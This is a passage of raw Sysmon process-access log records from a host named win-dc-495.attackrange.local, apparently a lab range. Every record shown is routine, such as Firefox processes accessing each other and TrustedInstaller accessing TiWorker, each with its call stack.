Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:34.035{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:35.191{59A5CD1D-93F8-6005-EB04-00000000A301}36642908C:\Windows\servicing\TrustedInstaller.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\combase.dll+693a8|C:\Windows\servicing\TrustedInstaller.exe+43a2|C:\Windows\servicing\TrustedInstaller.exe+1d1d|C:\Windows\servicing\TrustedInstaller.exe+28c6|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.722{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:36.691{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.972{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.691{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.691{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.691{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:37.472{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla 